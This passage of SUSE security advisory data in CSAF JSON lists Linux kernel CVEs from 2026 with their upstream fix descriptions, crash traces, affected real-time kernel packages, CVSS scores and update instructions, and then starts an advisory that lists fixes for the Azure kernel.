"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23000",
"url": "https://www.suse.com/security/cve/CVE-2026-23000"
},
{
"category": "external",
"summary": "SUSE Bug 1257234 for CVE-2026-23000",
"url": "https://bugzilla.suse.com/1257234"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2026-23000"
},
{
"cve": "CVE-2026-23001",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23001"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmacvlan: fix possible UAF in macvlan_forward_source()\n\nAdd RCU protection on (struct macvlan_source_entry)-\u003evlan.\n\nWhenever macvlan_hash_del_source() is called, we must clear\nentry-\u003evlan pointer before RCU grace period starts.\n\nThis allows macvlan_forward_source() to skip over\nentries queued for freeing.\n\nNote that macvlan_dev are already RCU protected, as they\nare embedded in a standard netdev (netdev_priv(ndev)).\n\nhttps: //lore.kernel.org/netdev/695fb1e8.050a0220.1c677c.039f.GAE@google.com/T/#u",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23001",
"url": "https://www.suse.com/security/cve/CVE-2026-23001"
},
{
"category": "external",
"summary": "SUSE Bug 1257232 for CVE-2026-23001",
"url": "https://bugzilla.suse.com/1257232"
},
{
"category": "external",
"summary": "SUSE Bug 1257233 for CVE-2026-23001",
"url": "https://bugzilla.suse.com/1257233"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "important"
}
],
"title": "CVE-2026-23001"
},
{
"cve": "CVE-2026-23005",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23005"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nx86/fpu: Clear XSTATE_BV[i] in guest XSAVE state whenever XFD[i]=1\n\nWhen loading guest XSAVE state via KVM_SET_XSAVE, and when updating XFD in\nresponse to a guest WRMSR, clear XFD-disabled features in the saved (or to\nbe restored) XSTATE_BV to ensure KVM doesn\u0027t attempt to load state for\nfeatures that are disabled via the guest\u0027s XFD. Because the kernel\nexecutes XRSTOR with the guest\u0027s XFD, saving XSTATE_BV[i]=1 with XFD[i]=1\nwill cause XRSTOR to #NM and panic the kernel.\n\nE.g. if fpu_update_guest_xfd() sets XFD without clearing XSTATE_BV:\n\n ------------[ cut here ]------------\n WARNING: arch/x86/kernel/traps.c:1524 at exc_device_not_available+0x101/0x110, CPU#29: amx_test/848\n Modules linked in: kvm_intel kvm irqbypass\n CPU: 29 UID: 1000 PID: 848 Comm: amx_test Not tainted 6.19.0-rc2-ffa07f7fd437-x86_amx_nm_xfd_non_init-vm #171 NONE\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 0.0.0 02/06/2015\n RIP: 0010:exc_device_not_available+0x101/0x110\n Call Trace:\n \u003cTASK\u003e\n asm_exc_device_not_available+0x1a/0x20\n RIP: 0010:restore_fpregs_from_fpstate+0x36/0x90\n switch_fpu_return+0x4a/0xb0\n kvm_arch_vcpu_ioctl_run+0x1245/0x1e40 [kvm]\n kvm_vcpu_ioctl+0x2c3/0x8f0 [kvm]\n __x64_sys_ioctl+0x8f/0xd0\n do_syscall_64+0x62/0x940\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\n \u003c/TASK\u003e\n ---[ end trace 0000000000000000 ]---\n\nThis can happen if the guest executes WRMSR(MSR_IA32_XFD) to set XFD[18] = 1,\nand a host IRQ triggers kernel_fpu_begin() prior to the vmexit handler\u0027s\ncall to fpu_update_guest_xfd().\n\nand if userspace stuffs XSTATE_BV[i]=1 via KVM_SET_XSAVE:\n\n ------------[ cut here ]------------\n WARNING: arch/x86/kernel/traps.c:1524 at exc_device_not_available+0x101/0x110, CPU#14: amx_test/867\n Modules linked in: kvm_intel kvm irqbypass\n CPU: 14 UID: 1000 PID: 867 Comm: amx_test Not tainted 6.19.0-rc2-2dace9faccd6-x86_amx_nm_xfd_non_init-vm #168 NONE\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 0.0.0 02/06/2015\n RIP: 0010:exc_device_not_available+0x101/0x110\n Call Trace:\n \u003cTASK\u003e\n asm_exc_device_not_available+0x1a/0x20\n RIP: 0010:restore_fpregs_from_fpstate+0x36/0x90\n fpu_swap_kvm_fpstate+0x6b/0x120\n kvm_load_guest_fpu+0x30/0x80 [kvm]\n kvm_arch_vcpu_ioctl_run+0x85/0x1e40 [kvm]\n kvm_vcpu_ioctl+0x2c3/0x8f0 [kvm]\n __x64_sys_ioctl+0x8f/0xd0\n do_syscall_64+0x62/0x940\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\n \u003c/TASK\u003e\n ---[ end trace 0000000000000000 ]---\n\nThe new behavior is consistent with the AMX architecture. Per Intel\u0027s SDM,\nXSAVE saves XSTATE_BV as \u00270\u0027 for components that are disabled via XFD\n(and non-compacted XSAVE saves the initial configuration of the state\ncomponent):\n\n If XSAVE, XSAVEC, XSAVEOPT, or XSAVES is saving the state component i,\n the instruction does not generate #NM when XCR0[i] = IA32_XFD[i] = 1;\n instead, it operates as if XINUSE[i] = 0 (and the state component was\n in its initial state): it saves bit i of XSTATE_BV field of the XSAVE\n header as 0; in addition, XSAVE saves the initial configuration of the\n state component (the other instructions do not save state component i).\n\nAlternatively, KVM could always do XRSTOR with XFD=0, e.g. by using\na constant XFD based on the set of enabled features when XSAVEing for\na struct fpu_guest. However, having XSTATE_BV[i]=1 for XFD-disabled\nfeatures can only happen in the above interrupt case, or in similar\nscenarios involving preemption on preemptible kernels, because\nfpu_swap_kvm_fpstate()\u0027s call to save_fpregs_to_fpstate() saves the\noutgoing FPU state with the current XFD; and that is (on all but the\nfirst WRMSR to XFD) the guest XFD.\n\nTherefore, XFD can only go out of sync with XSTATE_BV in the above\ninterrupt case, or in similar scenarios involving preemption on\npreemptible kernels, and it we can consider it (de facto) part of KVM\nABI that KVM_GET_XSAVE returns XSTATE_BV[i]=0 for XFD-disabled features.\n\n[Move clea\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23005",
"url": "https://www.suse.com/security/cve/CVE-2026-23005"
},
{
"category": "external",
"summary": "SUSE Bug 1257245 for CVE-2026-23005",
"url": "https://bugzilla.suse.com/1257245"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2026-23005"
},
{
"cve": "CVE-2026-23006",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23006"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nASoC: tlv320adcx140: fix null pointer\n\nThe \"snd_soc_component\" in \"adcx140_priv\" was only used once but never\nset. It was only used for reaching \"dev\" which is already present in\n\"adcx140_priv\".",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23006",
"url": "https://www.suse.com/security/cve/CVE-2026-23006"
},
{
"category": "external",
"summary": "SUSE Bug 1257208 for CVE-2026-23006",
"url": "https://bugzilla.suse.com/1257208"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2026-23006"
},
{
"cve": "CVE-2026-23011",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23011"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv4: ip_gre: make ipgre_header() robust\n\nAnalog to commit db5b4e39c4e6 (\"ip6_gre: make ip6gre_header() robust\")\n\nOver the years, syzbot found many ways to crash the kernel\nin ipgre_header() [1].\n\nThis involves team or bonding drivers ability to dynamically\nchange their dev-\u003eneeded_headroom and/or dev-\u003ehard_header_len\n\nIn this particular crash mld_newpack() allocated an skb\nwith a too small reserve/headroom, and by the time mld_sendpack()\nwas called, syzbot managed to attach an ipgre device.\n\n[1]\nskbuff: skb_under_panic: text:ffffffff89ea3cb7 len:2030915468 put:2030915372 head:ffff888058b43000 data:ffff887fdfa6e194 tail:0x120 end:0x6c0 dev:team0\n kernel BUG at net/core/skbuff.c:213 !\nOops: invalid opcode: 0000 [#1] SMP KASAN PTI\nCPU: 1 UID: 0 PID: 1322 Comm: kworker/1:9 Not tainted syzkaller #0 PREEMPT(full)\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/25/2025\nWorkqueue: mld mld_ifc_work\n RIP: 0010:skb_panic+0x157/0x160 net/core/skbuff.c:213\nCall Trace:\n \u003cTASK\u003e\n skb_under_panic net/core/skbuff.c:223 [inline]\n skb_push+0xc3/0xe0 net/core/skbuff.c:2641\n ipgre_header+0x67/0x290 net/ipv4/ip_gre.c:897\n dev_hard_header include/linux/netdevice.h:3436 [inline]\n neigh_connected_output+0x286/0x460 net/core/neighbour.c:1618\n NF_HOOK_COND include/linux/netfilter.h:307 [inline]\n ip6_output+0x340/0x550 net/ipv6/ip6_output.c:247\n NF_HOOK+0x9e/0x380 include/linux/netfilter.h:318\n mld_sendpack+0x8d4/0xe60 net/ipv6/mcast.c:1855\n mld_send_cr net/ipv6/mcast.c:2154 [inline]\n mld_ifc_work+0x83e/0xd60 net/ipv6/mcast.c:2693\n process_one_work kernel/workqueue.c:3257 [inline]\n process_scheduled_works+0xad1/0x1770 kernel/workqueue.c:3340\n worker_thread+0x8a0/0xda0 kernel/workqueue.c:3421\n kthread+0x711/0x8a0 kernel/kthread.c:463\n ret_from_fork+0x510/0xa50 arch/x86/kernel/process.c:158\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:246",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23011",
"url": "https://www.suse.com/security/cve/CVE-2026-23011"
},
{
"category": "external",
"summary": "SUSE Bug 1257207 for CVE-2026-23011",
"url": "https://bugzilla.suse.com/1257207"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2026-23011"
}
]
}
SUSE-SU-2026:0472-1
Vulnerability from csaf_suse - Published: 2026-02-12 11:26 - Updated: 2026-02-12 11:26Summary
Security update for the Linux Kernel
Severity
Important
Notes
Title of the patch: Security update for the Linux Kernel
Description of the patch:
The SUSE Linux Enterprise 15 SP7 Azure kernel was updated to fix various security issues
The following security issues were fixed:
- CVE-2023-54013: interconnect: Fix locking for runpm vs reclaim (bsc#1256280).
- CVE-2025-39880: libceph: fix invalid accesses to ceph_connection_v1_info (bsc#1250388).
- CVE-2025-40238: net/mlx5: Fix IPsec cleanup over MPV device (bsc#1254871).
- CVE-2025-40254: net: openvswitch: remove never-working support for setting nsh fields (bsc#1254852).
- CVE-2025-40257: mptcp: fix a race in mptcp_pm_del_add_timer() (bsc#1254842).
- CVE-2025-40259: scsi: sg: Do not sleep in atomic context (bsc#1254845).
- CVE-2025-40261: nvme: nvme-fc: Ensure ->ioerr_work is cancelled in nvme_fc_delete_ctrl() (bsc#1254839).
- CVE-2025-40264: be2net: pass wrb_params in case of OS2BMC (bsc#1254835).
- CVE-2025-40328: smb: client: fix potential UAF in smb2_close_cached_fid() (bsc#1254624).
- CVE-2025-40350: net/mlx5e: RX, Fix generating skb from non-linear xdp_buff for striding RQ (bsc#1255260).
- CVE-2025-40355: sysfs: check visibility before changing group attribute ownership (bsc#1255261).
- CVE-2025-40363: net: ipv6: fix field-spanning memcpy warning in AH output (bsc#1255102).
- CVE-2025-68171: x86/fpu: Ensure XFD state on signal delivery (bsc#1255255).
- CVE-2025-68174: amd/amdkfd: enhance kfd process check in switch partition (bsc#1255327).
- CVE-2025-68178: blk-cgroup: fix possible deadlock while configuring policy (bsc#1255266).
- CVE-2025-68188: tcp: use dst_dev_rcu() in tcp_fastopen_active_disable_ofo_check() (bsc#1255269).
- CVE-2025-68200: bpf: Add bpf_prog_run_data_pointers() (bsc#1255241).
- CVE-2025-68215: ice: fix PTP cleanup on driver removal in error path (bsc#1255226).
- CVE-2025-68227: mptcp: Fix proto fallback detection with BPF (bsc#1255216).
- CVE-2025-68241: ipv4: route: Prevent rt_bind_exception() from rebinding stale fnhe (bsc#1255157).
- CVE-2025-68245: net: netpoll: fix incorrect refcount handling causing incorrect cleanup (bsc#1255268).
- CVE-2025-68261: ext4: add i_data_sem protection in ext4_destroy_inline_data_nolock() (bsc#1255164).
- CVE-2025-68284: libceph: prevent potential out-of-bounds writes in handle_auth_session_key() (bsc#1255377).
- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255401).
- CVE-2025-68296: drm, fbcon, vga_switcheroo: Avoid race condition in fbcon setup (bsc#1255128).
- CVE-2025-68297: ceph: fix crash in process_v2_sparse_read() for encrypted directories (bsc#1255403).
- CVE-2025-68301: net: atlantic: fix fragment overflow handling in RX path (bsc#1255120).
